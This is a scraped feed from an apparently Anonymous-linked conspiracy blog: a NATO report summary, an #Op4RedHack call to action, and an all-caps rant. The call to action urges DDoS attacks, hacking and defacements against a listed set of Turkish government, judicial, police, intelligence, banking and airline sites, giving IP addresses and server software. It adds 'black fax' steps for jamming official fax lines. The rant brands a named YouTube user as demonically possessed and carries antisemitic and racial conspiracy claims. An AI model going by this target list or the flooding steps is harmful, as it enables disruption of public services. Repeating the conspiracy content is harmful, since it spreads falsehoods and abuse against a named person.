<a href="http://hellenandchaos.blogspot.ca/2012/11/sepharadimseparratielite-hebrewmongol.html">Sepharadim=Separrati="Elite" hebrewmongol descendant of Havra-Khan or Abraham. Pawns of the Dragon.</a></h3>
</div>
<div dir="ltr" style="text-align: left;">
<b><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 13px;">http://hellenandchaos.blogspot.ca/2012/11/sepharadimseparratielite-hebrewmongol.html </span></b>
</div>
<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-72844879505254679362012-11-30T04:34:00.000+01:002012-11-30T04:34:01.003+01:00#NATO Technical Report: Measuring the Effectiveness of Activities that Influence Attitudes and Behaviors Psychological Ops and Information Ops <br /><div class="entry">
<h2 class="posttitle">
<a href="http://publicintelligence.net/nato-measuring-influence/" rel="bookmark" title="Permanent Link to NATO Technical Report: Measuring the Effectiveness of Activities that Influence Attitudes and Behaviors">NATO Technical Report: Measuring the Effectiveness of Activities that Influence Attitudes and Behaviors</a></h2>
<div class="date">
November 28, 2012 in <a href="http://publicintelligence.net/category/documents/north-atlantic-treaty-organization-documents/" rel="category tag" title="View all posts in North Atlantic Treaty Organization">North Atlantic Treaty Organization</a> </div>
<div class="entry">
<a href="http://info.publicintelligence.net/NATO-MeasuringInfluence.pdf"><img alt="" class="alignright wp-image-29595" height="431" src="http://publicintelligence.net/wp-content/uploads/2012/11/NATO-MeasuringInfluence.png" style="margin: 10px;" title="NATO-MeasuringInfluence" width="291" /></a><br />
<h3>
How to Improve your Aim: Measuring the Effectiveness of Activities that Influence Attitudes and Behaviors</h3>
<ul>
<li>100 pages</li>
<li>This document should be announced and supplied only to NATO,
Government Agencies of NATO nations and their bona fide contractors, and
to other recipients approved by the RTO National Coordinators.</li>
<li>August 2011</li>
</ul>
<a href="http://info.publicintelligence.net/NATO-MeasuringInfluence.pdf"><img alt="Download" height="50" src="http://publicintelligence.net/download.jpg" style="border: 0px none; margin: 10px;" width="170" /></a><br />
<blockquote>
The emphasis of military operations is shifting more and
more towards non-kinetic activities, such as Psychological Operations
and Information Operations, which are geared towards influencing
attitudes and behaviors of specific target audiences. Though many such
activities are undertaken, there is little systematic evaluation of the
effects they bring about and their effectiveness. As a result, it is not
well known what these operations contribute to the overall operation
and to what degree they are achieving their goals. The purpose of the
Task Group HFM-160 was to develop a systematic approach to the
Measurement Of Effectiveness (MOE) of influence operations.<br />
In our approach, we consider MOE to be a process rather than a
“thing”; there is no definitive list of MOE or even an overview of best
practices. All MOE are custom made for a specific situation. Our
approach is a way of thinking about how to assess the effects of what
you have done and how effective you have been. MOE is most intuitively
suited to influence operations, such as PSYOPS. However, any operation
will affect attitudes and behaviors – especially kinetic operations. For
this reason, our approach generalizes across the whole operations
spectrum: from PSYOPS and CIMIC to the most assertive kinetic activity.
Our work takes NATO PSYOPS doctrine (AJP 3.10.1) as a starting point and
augments it specifically for MOE. There where we feel existing
definitions and procedures are insufficient, we take the liberty to
develop our own. Our approach should be seen as a starting point. It is
not possible to become an MOE expert in a couple of days after reading
about our approach. Furthermore, some activities in the approach, such
as statistical analysis, should be supported by knowledgeable
individuals; just knowing that something should be done is not the same
as being able to do it. The approach was designed for operational and
tactical levels working with, commissioning, developing or interpreting
MOE for any type of influence activity. They should gain an
understanding of the complexity of attitudinal and behavioral MOE, the
basics of how to embed MOE in operations and the basics of how to
develop MOE such that it yields the desired – or at least useful –
information.<br />
The most important key concepts in the HFM-160 approach to MOE are:
effects and effectiveness. Effects refer to changes in the environment,
potentially brought about by your actions, though other forces may lead
to the observed effects. Effectiveness refers to the degree to which
your actions are responsible for bringing about the desired effects.
Effects can be seen as a goal in and of themselves; what causes the
effects is relatively unimportant as long as the effects are manifested.
In terms of effectiveness, how the change comes about is key. It is not
enough that change has occurred; you must gain insight into the cause
of this change: either your actions or something else.<br />
…<br />
2.2.1 Effects<br />
Every operation conducted is geared towards realizing a particular
effect. In terms of kinetic activities, this may be to diminish the
adversary’s fire power or limit their mobility. In operations geared
towards attitudinal and behavioral change, it may be to create support
within the local population or something more tangible such as
collecting firearms in civilians’ possession. In all cases, the goal is
to change something through your actions. Any change resulting from any
operation may be identified as an effect. Though hopefully the effect
you want is what changes, an effect may also be unwanted or unintended.
Effects may be positive or negative. They may also be material,
attitudinal or behavioral.<br />
…<br />
<a href="http://publicintelligence.net/wp-content/uploads/2012/11/NATO-MeasuringInfluence-21.png"><img alt="" class="aligncenter wp-image-29598" height="417" src="http://publicintelligence.net/wp-content/uploads/2012/11/NATO-MeasuringInfluence-21.png" title="NATO-MeasuringInfluence-2" width="565" /></a></blockquote>
</div>
</div>
<span class="tags">Tags: <a href="http://publicintelligence.net/tag/north-atlantic-treaty-organization/" rel="tag">North Atlantic Treaty Organization</a>, <a href="http://publicintelligence.net/tag/psychological-operations/" rel="tag">Psychological Operations</a>, <a href="http://publicintelligence.net/tag/strategic-communications/" rel="tag">Strategic Communications</a></span><div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-42328141796394047862012-11-27T00:40:00.003+01:002012-11-27T00:40:41.144+01:00Anonymous Operation support Redhack #Op4RedHack<div class="entrytitle">
Anonymous Operation support Redhack </div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/LLvIhogjQh4?feature=player_embedded' frameborder='0'></iframe></div>
<div class="entrytitle">
</div>
Greetings Citizens of the world, this is Anonymous.<br />
It has come to our attention that the Turkish government want to
prosecute a hacker group called Redhack, they are accused of being a
“terror organisation.” Prosecutors will demand up to 24 years
imprisonment for people who have no connection to Redhack.<br />
<br />
They opposed and carried out actions against rapes, out of date milk
distributed to school children, which resulted in 100′s being poisoned,
and the country being prostituted to the capitalists. They opposed child
pornography, internet censorship, and brutal government opposition.
Lately, they have been viciously attacked by the Fascist Turkish State
because they share information which already belongs to the people. The
most significant of these attacks is the one that has been levied
against innocent people who have no link to Redhack. These people, who
have shared information on social media about these actions, are now
held for ransom, solely in order to demonise Redhack and cut their
support.<br />
<br />
Redhack openly declared that Duygu Kerimoglu, Ugur Cihan Okutulmus
and AllaatinKaragenc are not their members. Nor are the seven others, on
bail.<br />
<br />
We implore the public to give their support to these innocent people.
We call on all hacktivists, activists, freedom defenders, human rights
organisation to demand an end to the restraints imposed on these three
innocent people on remand, and the seven others on bail.<br />
<br />
No matter how dark it may seem, no matter how alone and abandoned you
may feel know that over 9 thousands of us in Anonymous are with you and
working tirelessly around the clock to bring you every assistance. To
the people of Turkey and Redhack, know that Anonymous stands with you in
this fight.<br />
<br />
We are Anonymous.<br />
We are Legion.<br />
We do not forgive.<br />
We do not forget.<br />
Expect us.<br />
<br />
<br />
<div style="text-align: center;">
IRC: =[]= <a href="irc://irc.anonops.com">irc.anonops.com</a> channel #Op4RedHack || <a href="http://webchat.anonops.com/" target="_blank">WebChat</a> channel #Op4RedHack =[]=</div>
Court hearing details: 26th November 2012 – 10:00am at 13th Ankara High Criminal Court<br />
<br />
<br />
<h3>
</h3>
<h3 style="text-align: center;">
<span style="color: #ff6600;">Committee of Freedom for Redhack Prisoners</span></h3>
<h3>
</h3>
<h3 style="text-align: center;">
<span style="color: #ff6600;">(Redhack Supporters and @TurkeyAnonymous)</span></h3>
<div style="text-align: center;">
<a href="http://www.cyberguerrilla.org/blog/wp-content/uploads/2012/11/A8oOT4mCIAE4rpY.jpg" target="_blank"><img alt="" class="aligncenter wp-image-7792" height="410" src="http://www.cyberguerrilla.org/blog/wp-content/uploads/2012/11/A8oOT4mCIAE4rpY.jpg" title="A8oOT4mCIAE4rpY" width="614" /></a></div>
<strong>ACTIONS to take immediately</strong><br />
<br />
<strong>* Sign the petitions</strong><br />
<br />
English: http://www.gopetition.com/petitions/turkish-government-free-the-innocent.html<br />
Turkish: http://imza.la/redhack-tutsaklarina-ozgurluk-komitesi<br />
French: http://www.avaaz.org/fr/petition/Liberation_des_prisonniers_RedHack/?wRPKucb<br />
<br />
<strong>*E-mail or Fax authorities with your protest messages</strong><br />
Ministry of Justice<br />
Sadullah Ergin<br />
E-Mail: <span class="mh-email">i<a href="http://www.google.com/recaptcha/mailhide/d?k=01cmm2wq5SdBcWv2xtW8ZfGQ==&c=odoEo0cOW0sBf64OsOE928ZleioQ3aC0-o4sD89BoSo=" title="Reveal this e-mail address">...</a>@adalet.gov.tr</span><br />
Fax: 0090 312 419 3370<br />
Ministry of Transport, Maritime Affairs and Communication<br />
Binali Yildirim<br />
E-Mail: <span class="mh-email">o<a href="http://www.google.com/recaptcha/mailhide/d?k=01cmm2wq5SdBcWv2xtW8ZfGQ==&c=0sakA5uFx1oHa-km6m5HOA==" title="Reveal this e-mail address">...</a>@ubak.gov.tr</span><br />
Fax: 0090 312 212 4930<br />
<br />
<strong>*Carry out DDOS attacks Hacking or Defacements</strong><br />
List of possible targets:<br />
-AKP Justice and Development Party * www.akparti.org.tr Server Type: cloudflare-nginx IP: 108.162.202.14<br />
- Ankara Police * ankara.pol.tr * IP Address: 82.222.167.180<br />
- Turkish Parliament * www.tbmm.gov.tr * IP Address:212.174.157.30<br />
- Turkish Parliament TV * www.tbmmtv.gov.tr * Server Type:Microsoft-IIS/7.5 * IP :212.174.157.26<br />
- President * www.tccb.gov.tr * Server Type:Microsoft-IIS/7.0 * IP :212.174.172.67<br />
- Prime Minister*www.basbakanlik.gov.tr *Server Type:Microsoft-IIS/7.5* IP :195.140.196.16<br />
- Ministry of Justice * www.adalet.gov.tr * Server Type:Microsoft-IIS/7.5 * IP:212.175.130.16<br />
- Council of State www.danistay.gov.tr * Server
Type:Oracle-Application-Server-10g/9.0.4.0.0 Oracle-HTTP-Server * IP:
212.175.130.170<br />
- Constitutional Court * www.anayasa.gov.tr *Server Type:Apache/2.0.63 (Win32) PHP/5.2.12 IP : 212.175.130.160<br />
- Security Services Directorate * www.egm.gov.tr * IP : 82.222.167.154<br />
- National Intelligence Service * www.mit.gov.tr * Server Type:Web-Server * IP : 95.0.48.234<br />
- Istanbul Stock Exchange* www.imkb.gov.tr * Server Type:Microsoft-IIS/6.0*IP: 212.174.168.206<br />
- Central Bank * www.tcmb.gov.tr * Server Type: Apache * IP Address: 212.174.145.11<br />
- National Judiciary Informatics System * www.uyap.gov.tr *Server Type: Microsoft-IIS/7.5 IP: 212.175.130.16<br />
- Banking Regulation&Supervision Agency * www.bddk.org.tr * Server Type: Microsoft-IIS/6.0 IP: 212.175.177.73<br />
- State owned bank * www.ziraat.com.tr * Server Type: Microsoft-IIS/7.5 * IP:195.177.206.17<br />
- State owned bank * www.halkbank.com.tr * IP : 193.108.213.150<br />
- State owned bank * www.vakifbank.com * IP: 195.142.246.55<br />
- National Airline carrier * www.turkishairlines.com * IP: 46.31.112.71<br />
<br />
<strong>Black Fax</strong><br />
The purpose of a black fax is to overwhelm the fax machine on the
opposite end of a communication, either causing it to run out of ink /
toner or to mechanically shut down.<br />
Fax content http://www.iv.pl/images/78973253525296743304.jpg<br />
Send Free from http://faxzero.com/ – http://www.gotfreefax.com/<br />
Use the full free allowance and use both websites.<br />
Ministry of Transport, Maritime Affairs and Communication Fax: 0090 312 212 4930<br />
Ministry of Justice Fax: 0090 312 419 3370<br />
Ministry of Justice Prisons Directorate Fax: 0090 312 223 6007<br />
Ankara Police Headquaters Fax: 0090 312 3840703<br />
<br />
Paste: http://pastehtml.com/view/cjcuz1107.rtxt<div class="blogger-post-footer">This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Signed, Anonymous LgnSec
Copyright © 1994-2018 LegionNET Inc, Inc. SOME RIGHTS RESERVED.
LegionNET Inc ® is a registered trademark of LegionNET, Inc. @Moon
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2615012028595202594.post-48837459588165839852012-11-23T16:46:00.000+01:002012-11-23T16:47:40.413+01:00GHREES HAS FORETOLD THAT FORMER ALLIES WOULD BECOME VENOMOUS ENEMIES. DANA HOROCHOWSKI IS TURNED. #AWAKEN #DECEPTINO #FRACTIONS #LEGION<h2 class="date-header">
Friday, November 23, 2012</h2>
<h2 class="date-header">
<img alt="O.E.A." height="72" id="Image1_img" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQl3DlXiHPR1sJkmYxJcZU_OlshsazCRAeyR5c68oTCqSJwaMhnacnAofY50uPT5FLzZAUNXYtH2wJ8ZlUUpL5z8TiSB-XvLvs8gjrhEjFO2TfrwHd7tu1yv4fQ5q09huCPovFq9g1Vfc/s240/OEAemblem.jpg" style="visibility: visible;" width="199" />
</h2>
<a href="http://www.blogger.com/blogger.g?blogID=2615012028595202594" name="7715716003191447276"></a>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://hellenandchaos.blogspot.ca/2012/11/ghrees-has-foretold-that-former-allies.html">GHREES HAS FORETOLD THAT FORMER ALLIES WOULD BECOME VENOMOUS ENEMIES. DANA HOROCHOWSKI IS TURNED.</a>
</h3>
<div class="post-header">
</div>
<div dir="ltr" style="text-align: left;">
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="font-size: x-small;">BEWARE! THE SO
CALLED<span style="font-size: x-small;"> </span><a href="http://www.youtube.com/user/jrgenius?feature=watch" target="_blank">DANA HOROCHOWSKI</a> USER SEEMS TO BE UNDER DEMONIC/DRACONIAN
POSSESSION-CATALEPSY!</span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">USER DANA HOROCHOVSKI
IS NOW AN AGENT OF DARKNESS. DANA BETRAYED THE TRUST AND THE CAUSE OF
GHREES AND "HELLEN VS CHAOS" BLOG, THE ONE AND ONLY OFFICIAL BLOG OF GHREES AND GHREES MATERIAL </span><span style="font-size: x-small;">.
</span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">SHE SEEMS TO BE UNDER
DEMONIC/DRACONIAN POSSESSION. SHE IS NOT TO BE TRUSTED. IF THAT IS THE CASE, SHE HAS BECOME A CANCEROUS
CELL TO THE UNIVERSAL ORGANISM. </span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">WATCH VERY CAREFULLY
HER VIDEOS AND TAKE A GOOD LOOK IN HER EYES AND YOU WILL NOTICE EVIDENCE OF DEMONIC/DRACONIAN POSSESSION.
</span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">WE WERE WARNED THAT
THIS WOULD HAPPEN WHEN THE THINGS GOT ROLLING. THAT THOSE WHO PRETEND TO BE OUR
ALLIES WILL BACKSTAB US EVENTUALLY. AND NOW IT IS A FACT. <b>WHILE
GHREES SPOKESMAN Y. KARAGEORGIOU IS IMPRISONED FOR WARNING NEOGREEKS AND
REST OF WORLD OF THE IMMINENT PLANNING OF THE B.A.S.T./R. INVASION IN
GREECE, WHILE </b></span><span style="font-size: x-small;"><b>HE IS BEING
FINANCIALLY "MURDERED" IN ORDER TO SHUT HIM UP, DANA HOROCHOWSKI PICKS
THIS TIME EXACTLY TO SPILL VENOM AGAINST GHREES, AGAINST HELLEN VS CHAOS
BLOG ACCUSING US OF BEING INFILTRATED. WHAT A COINCIDENCE!</b> TALK ABOUT TIMING HERE! FROM THE MUMBO JUMBO OF HER VENOM WE UNDERSTOOD THAT <b>SHE
DOES NOT LIKE THE EFFORT TO WAKE UP NEOGREEKS TO TAKE THEIR COUNTRY
BACK BEFORE IMMINENT DISASTER, TO DISCLOSE NEVER BEFORE TOLD MILITARY
PLANNING IN GREECE, HIDDEN IN PLAIN VIEW. MILITARY PLANNING TO INITIATE
AN ATTACK AGAINST GREECE AND GREEK PEOPLE. SHE DOES NOT LIKE THE LOGICAL
AND APPLICABLE SOLUTIONS GIVEN BY GHREES IN ORDER TO DEFEND AND NOT TO
PROVOKE WAR. <span style="font-size: x-small;">GREECE MUST FALL ACCORDING TO THEM. WELL,<span style="font-size: x-small;"> NOT<span style="font-size: x-small;"> ON OUR WATCH.</span></span></span></b><br /> </span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="font-size: x-small;"><b>OF COURSE NO DRACONIAN IMPOSTOR WOULD <span style="font-size: x-small;">WANT</span> THAT.</b> NOT NOW THAT EVERYTHING SEEMS TO GO IN THEIR WAY.<span style="font-size: x-small;">..</span></span></span><br />
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">Y.<span style="font-size: x-small;"> </span>KARAGEORGIOU,
GHREES, HELLEN VS CHAOS ARE A NUCLEAR EXPLOSIVE IN THE HEART OF THEIR
GENOCIDAL PLAN SO THEY WILL APPLY ALL THEIR DISTORTING TECHNIQUES AND
TRICKS TO SHUT THEM DOWN. <b>NEOGREEKS, BLACK AND WHITE RACES MUST NOT KNOW THE WHOLE TRUTH ESPECIALLY THIS TIME PERIOD.</b>
SO THEY WILL USE ALL THEIR ARSENAL. THEY WILL USE FORMER ALLIES AGAINST
US. ECONOMIC WARFARE, PSY WAR, PROPAGANDA. AND DANA FITTED IN EXACTLY
IN THIS PLANNING!</span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">DANA HOROCHOWSKI YOU COMMITED HYBRIS. YOU CRITICIZE GHREES!!! AN INTERNET USER, A YOUTUBE USER
ATTEMPTS TO CRITICIZE THOSE WHO WROTE AND ANALYZED HOW THE UNIVERSE WORKS! THOSE
WHO <span style="font-size: x-small;">UNRAVELED</span> THE DODECAHEDRIC
STRUCTURE OF THE UNIVERSE, THOSE WHO DECODED THE
ULTIMATE GENOCIDAL PLAN HIDDEN IN PLAIN SIGHT IN THE BIBLICAL WRITINGS.
IT IS LIKE THE FEET TURNING TO HIT THE HEAD, AS WE SAY IN GREECE. </span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">TWICE THE PRIDE
DOUBLE THE FALL DANA HOROCHOWSKI. </span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">YOU ACCUSE HELLEN VS
CHAOS OF BEING INFILTRATED... YOU DRACONIAN AGENT OF DECEIT. <b>INFILTRATED WHERE
AND HOW? THEY INFILTRATED OUR BROKEN HOMES, OUR DISMANTLED FAMILIES, OUR ZERO
FUND ACCOUNTS? THEY INFILTRATED US AND GOT US IN PRISON? HELL OF A JOB! </b><br /><br />YOU DO NOT KNOW <b>THE PERSONAL SACRIFICES WE HAVE BEEN THROUGH AND
YOU HAVE THE NERVE TO CALL US PSY OP AGENTS? WE GAVE EVERYTHING! EVERYTHING WE
HAD TO PROTECT THE PLANET FROM DISASTER</b> AND YOU FROM YOUR LAPTOP, AND YOUR
"YOUTUBE ACCOUNT" AND YOUR COSY CHAIR WITH KNOWLEDGE TAKEN FROM US,<span style="font-size: x-small;"> YOU </span>ARE
JUDGING US?<span style="font-size: x-small;"> T<span style="font-size: x-small;">WISTING AND MI<span style="font-size: x-small;">XING US WITH IMPOSTORS LIKE KAVASSILAS <span style="font-size: x-small;">WHOM WE F<span style="font-size: x-small;">IRST DEBUNKED FOR BEING A COIN<span style="font-size: x-small;">TELPRO LUNATIC DRACONIAN AGENT OF DECEIT<span style="font-size: x-small;">, WITH MORNING SKY AND WIT<span style="font-size: x-small;">H POLITICIANS<span style="font-size: x-small;">. </span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;">IF OBAMA <span style="font-size: x-small;"><span style="font-size: x-small;">LISTENED TO GHREES SUGGESTIONS HE <span style="font-size: x-small;">WOULD HAVE THE KNOWLE<span style="font-size: x-small;">DGE<span style="font-size: x-small;">, THE <span style="font-size: x-small;">ARSENAL TO POST<span style="font-size: x-small;">PONE WWIII<span style="font-size: x-small;">, POST<span style="font-size: x-small;">PONE GLOBAL <span style="font-size: x-small;">G<span style="font-size: x-small;">ENOCI<span style="font-size: x-small;">DE AND EXTINCTION. <span style="font-size: x-small;">AND <span style="font-size: x-small;">GUESS WHAT. WE AR<span style="font-size: x-small;">E NOT AT WAR YET. </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span> </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;">YOU THINK YOU
INVENTED THE WHEEL WITH OTHER PEOPLE'S KNOWLEDGE AND NOW YOU HAVE BECOME A
JUDGE? A "RAINBOW WARRIOR"? DO YOU EVEN KNOW WHAT THE COLORS OF THE RAINBOW
REPRESENT? YOU HAVE MIXED <b>GNOSTICISM, PROTOCHRISTIANISM, PAGANISM, NEW AGE, THEOSOPHY, <a href="http://youtu.be/ewU4_Cpt_i8" target="_blank">TSARIONESQUE</a>
TACTICS AND YOU HAVE FORCED YOUR BRAIN TO "LOCK" TO YOUR "TRUTH",
FEEDING THE DECEPTION VIRUS IN YOUR SYSTEM. OPENING YOURSELF TO
MALEVOLENT INTER-DIMENSIONAL ENTITIES</b><span style="font-size: x-small;"><b> </b><span style="font-size: x-small;"><b>WH<span style="font-size: x-small;">ICH</span> </b><span style="font-size: x-small;"><b>ARE CLOUDING</b><span style="font-size: x-small;"><b> YOUR </b><span style="font-size: x-small;"><b>JUDGEMENT.</b> YOU FALL INTO THE NEW AGE<span style="font-size: x-small;">, 5TH DIMENSION AS<span style="font-size: x-small;">CENSION, AQUARIUS THEOSOPHIC DECEIT OF "PO<span style="font-size: x-small;">SITI<span style="font-size: x-small;">VE THINKING" WHICH BECOMING A DO<span style="font-size: x-small;">GMA<span style="font-size: x-small;">, WILL LEAD TO A PLANETARY<span style="font-size: x-small;"> <span style="font-size: x-small;">DESTRUCTION. WE SEE <span style="font-size: x-small;">ITS</span> CORROSIVE INFLUENCE AROUND US<span style="font-size: x-small;">. PEOPLE BELIEVIN<span style="font-size: x-small;">G IN <span style="font-size: x-small;">ASCENDING</span> DIMENSIONS<span style="font-size: x-small;">, PROJECTIONS, CHANNELED MATERIALS, ALL OF W<span style="font-size: x-small;">HI<span style="font-size: x-small;">CH ARE DRACONIAN<span style="font-size: x-small;"> <span style="font-size: x-small;">"SORCERY"<span style="font-size: x-small;"> AND IN NO WAY<span style="font-size: x-small;"> A PATH TO ANY ASCENSION<span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"> </span></span> OR ANY<span style="font-size: x-small;"> IMPROVEMENT OR ANY LIBE<span style="font-size: x-small;">RATION.<span style="font-size: x-small;"> IT IS ANOTHER WAY TO <span style="font-size: x-small;">SEP<span style="font-size: x-small;">ARATION<span style="font-size: x-small;">, TO <span style="font-size: x-small;"><span style="font-size: x-small;">PERDITION</span> AND TO LOSS OF ONE<span style="font-size: x-small;">'S S<span style="font-size: x-small;">ELF. PEOPLE BEL<span style="font-size: x-small;">IEVIN<span style="font-size: x-small;">G THEY ARE THE "C<span style="font-size: x-small;">HOSEN ONES"<span style="font-size: x-small;">, THE IN<span style="font-size: x-small;">ITIATES TO AS<span style="font-size: x-small;">CENSION<span style="font-size: x-small;"> LEAVING THOSE WHO CANNOT COPE WITH "5<span style="font-size: x-small;">TH D<span style="font-size: x-small;">IMENSION<span style="font-size: x-small;">" B<span style="font-size: x-small;">URN TO THE GROUND.<span style="font-size: x-small;"> TH<span style="font-size: x-small;">ESE ARE <span style="font-size: x-small;">"GALACTIC FEDERATION O<span style="font-size: x-small;">F LIG<span style="font-size: x-small;">HT" AND OTHER IMPOST<span style="font-size: x-small;">E</span>R<span style="font-size: x-small;">S'</span> BULLSHIT.</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span><br />
<br />
<span style="font-family: inherit;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;"><span style="font-size: x-small;">STORM IS COMING AND PEOPLE AR<span style="font-size: x-small;">E <span style="font-size: x-small;">STILL NOT READY FOR WHAT THEY ARE ABOUT TO FACE. FALSE H<span style="font-size: x-small;">OPES WILL BE SHATTERED<span style="font-size: x-small;">. WE SPE<span style="font-size: x-small;">AK <span style="font-size: x-small;">OF <span style="font-size: x-small;">WHAT NO ONE WANTS TO FACE<span style="font-size: x-small;">. THE TRUTH. GHREES LAID <span style="font-size: x-small;">OUT THE PLAN FOR <span style="font-size: x-small;">OUR DEMI<span style="font-size: x-small;">SE AND THE ONLY REALISTIC WAYS TO FIGHT AG<span style="font-size: x-small;">AINST <span style="font-size: x-small;">IT. IT WILL NOT BE EASY, IT WILL NOT BE <span style="font-size: x-small;">A MATTER OF "POSITIVE THINKING"<span style="font-size: x-small;">. <span style="font-size: x-small;">IT DEMANDS FULL CONSCIENCE,<span style="font-size: x-small;"> FULL DETERMINATION AND <span style="font-size: x-small;">T<span style="font-size: x-small;">ITANIUM<span style="font-size: x-small;"> WILL<span style="font-size: x-small;">. </span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span> </div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="font-size: x-small;"></span></span><br />
<span style="font-family: inherit;"><span style="font-size: x-small;">YOU
ARE NOT ALLOWED
TO USE GHREES MATERIAL ANYMORE. YOU ARE NOT ALLOWED TO TWIST AND SPIN
THE TRUE AUTHENTIC KNOWLEDGE CONTAINED IN THE GHREES VAULT. YOU ARE NOW
STIGMATIZED. YOU ARE NOW A PART OF
THE CONSPIRACY. YOU ARE DEAD FOR US.</span></span><br />
<span style="font-family: inherit;"></span><br />
<span style="font-family: inherit;"><span style="font-size: x-small;">TAKE YOUR RAINBOWS,
YOUR DRACONIAN PIMP AND SHOVE IT UP YOUR POSSESSED ASSHOLE! </span></span><br />
<span style="font-family: inherit;"><span style="font-size: x-small;"></span></span><br />
<span style="font-family: inherit;"><span style="font-size: x-small;">AS ALWAYS, YOU ARE LEGION, WE ARE FEW. </span></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br />
<b>BEWARE THE SHE-WOLF</b></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/iRVxG-W-wfQ?feature=player_embedded' frameborder='0'></iframe></div>
<div style="text-align: center;">
<b> </b>The mother of all that is evil<br />
Her lips are poisonous venom<br />
Wicked temptress knows how to please<br />
The priestess roars, "Get down on your knees"(WE SHALL NOT!)</div>
<div style="text-align: center;">
</div>
<div style="text-align: justify;">
Previous message:<br />
<h3 class="post-title entry-title" itemprop="name">
<a href="http://hellenandchaos.blogspot.ca/2012/11/bibis-statement-operation-kill.html">BIBI'S STATEMENT... OPERATION KILL EVERYTHING</a></h3>
<h2 class="date-header">
<span>Sunday, November 18, 2012</span></h2>
<a href="http://www.blogger.com/blogger.g?blogID=2615012028595202594" name="1712267032556177045"></a>
<h3 class="post-title entry-title" itemprop="name">
<a href="http://hellenandchaos.blogspot.ca/2012/11/2nd-ultra-urgent-sos-american-pentagon.html">2nd
ULTRA URGENT SOS-AMERICAN PENTAGON + TURKISH HIGH MINISTRY OF DEFENSE +
MINISTRY OF DEFENSE OF THE EMIRATE OF QUATAR ARE PREPARINGTHE
INSTALLATION OF QUATAR ISLAMIC ARMED FORCES IN DEFENSE OF TURKISH GREEKS
